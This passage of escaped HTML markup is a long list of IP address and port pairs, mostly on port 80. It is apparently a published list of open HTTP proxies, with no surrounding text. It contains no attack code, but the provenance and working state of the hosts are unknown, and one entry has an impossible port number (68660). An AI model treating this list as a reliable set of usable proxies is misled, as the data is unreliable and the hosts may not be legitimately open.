/&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.240.12.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.251.131.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.173.164.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.20.163.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.154.44.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.233.229.235:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.97.152:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;132.67.252.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.250.164.55:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;192.38.67.46:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;146.164.42.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.143.123.86:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.145.77.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.206.55.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.213.221.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.176.123.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.3.75.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.108.203.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;164.58.28.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;18.74.7.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.245.108.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.187.142.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;129.125.103.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.142.40.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;173.45.91.83:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.36.240.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.168.68.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.208.9.21:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.119.213.48:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.203.201.220:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93.19.1.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.174.39.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.169.190.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;97.65.18.92:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.170.219.121:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.232.9.8:4242&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.198.165.219:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.103.185.182:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.207.211.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.248.160.129:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;86.2.157.153:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.92.131.88:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.84.121.205:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.69.85.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.208.26.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.208.26.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;84.234.141.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.193.213.185:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.208.20.231:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.182.164.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.112.113.151:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.108.235.191:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.107.48.217:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.101.212.61:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.101.105.249:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.100.214.69:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;84.237.122.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;84.19.181.49:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.91.252.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.168.76.143:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.170.110.243:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.103.191.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.100.149.29:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.100.217.148:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.135.70:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.23:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.228:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.222:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.209:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.212:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.201:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.199:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.177:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.166:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.120:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.99:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.98:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.69:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.57:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.64:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.96:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.101:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.116:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.122:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.145:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.175:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.180:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.179:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.206:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.219:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.223:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.229:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.88.107.213:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.100.140.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.103.191.175:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.13.255.222:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.151.226.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;83.246.114.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;84.205.2.235:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;84.85.93.15:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.10.193.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.101.118.103:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.100.253.187:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.101.246.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.154.167.155:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.154.167.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.107.177.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.193.204.171:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.208.17.53:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.208.27.247:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.222.0.183:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.69.49.143:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.96.220.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;86.109.113.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;86.122.120.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.31.143.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.121.89.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.23.230.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.246.126.253:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;98.192.125.23:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.170.219.89:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.31.143.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.121.142.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.252.55.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;86.54.12.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.99.134.119:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.195.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.160:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.3.18.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;121.242.73.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.160.190.25:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.187.142.70:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;143.205.172.12:68660&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.248.250.101:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.143.113.12:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.99.188.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.14.38.95:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.74.31.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.216.199.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.216.201.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.86.4.103:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.104.161.205:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.57:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.54.31.216:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.72.155.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.88.181.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.200.84.93:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.24.250.238:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.108.97.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.21.129.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.240:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.136.97.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.196.63.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.203.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;60.56.229.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.146.4.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.34.121.216:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.232:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.71.159.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.90.184.117:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.210.165.194:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.230.212.209:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;69.64.70.166:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.51.36.229:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;74.115.6.56:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;74.54.21.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;78.129.145.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;79.187.44.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.40.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.40.175:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.40.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.41.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.41.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.42.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.42.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.12:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.243:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.33:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.77:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.59.157:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.5.1.135:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;80.255.42.64:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;80.81.242.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.144.255.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.77:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.192:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;59.120.5.209:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.163:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;61.6.163.33:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;61.121.223.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.8.122.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.165.228.28:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.240.34.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;75.126.176.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;78.88.30.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.183.116.70:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.63.12:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.35:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.33:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.32:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.67.127.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.67.103.28:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.66.49.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.43.218.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.245.193.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.235.157.128:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.236.20.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.234.8.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.233.83.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.231.252.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.226.1.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.210.147.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.204.219.223:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.54:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.33:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.190:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.181:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.193.220.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.135:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.191.190.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.182.78.122:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.182.77.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.161.5.209:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.160.42.120:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.151.211.41:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.150.139.32:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.148.70.194:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.146.42.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.143.153.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.141.201.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.141.197.177:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.139.12.39:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.137.247.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.89.97.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.127.76.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.233.9.240:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.2.85.105:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.2.80.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.2.78.57:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 